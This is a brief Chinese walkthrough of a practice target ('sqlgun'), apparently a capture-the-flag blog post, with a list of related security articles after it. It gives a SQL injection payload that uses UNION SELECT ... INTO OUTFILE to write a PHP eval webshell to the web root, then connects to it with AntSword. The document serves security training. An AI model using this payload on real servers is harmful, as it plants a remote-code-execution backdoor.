sqlgun靶场练习

1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞

2.有xss大概率也存在sql注入,测试到3的时候发现有回显

3.进一步得出库名

4.要get shell的话我们可以尝试写一句话木马进去,构建payload

key=-1' union select 1,"<?php @eval($_POST[cmd]); ?>", 3 into outfile '/var/www/html/1.php'#

5.访问我们写进去的1.php,确认木马已写入

6.打开蚁剑连接

7.在根目录下得到flag

相关推荐
群联云防护小杜6 分钟前
服务器被攻击怎么办
运维·服务器·网络·网络协议·安全·web安全
Hacker_Oldv2 小时前
网络安全攻防学习平台 - 基础关
网络·学习·web安全
网络安全(king)2 小时前
网络安全之接入控制
网络·学习·安全·web安全
hackeroink3 小时前
【网络安全零基础入门】PHP环境搭建、安装Apache、安装与配置MySQL(非常详细)零基础入门到精通,收藏这一篇就够(01)_php安装配置教程
web安全·php·apache
?333335 小时前
CTFHub Web进阶-PHP-Bypass disable_function攻略
开发语言·安全·web安全·php
hking1115 小时前
upload-labs关卡记录12
web安全·php
网安-轩逸7 小时前
基于ISO 21434的汽车网络安全实践
web安全·汽车·php
亚远景aspice7 小时前
亚远景-ISO 21434标准下的汽车网络安全测试:全面要求与实施策略
网络·web安全·汽车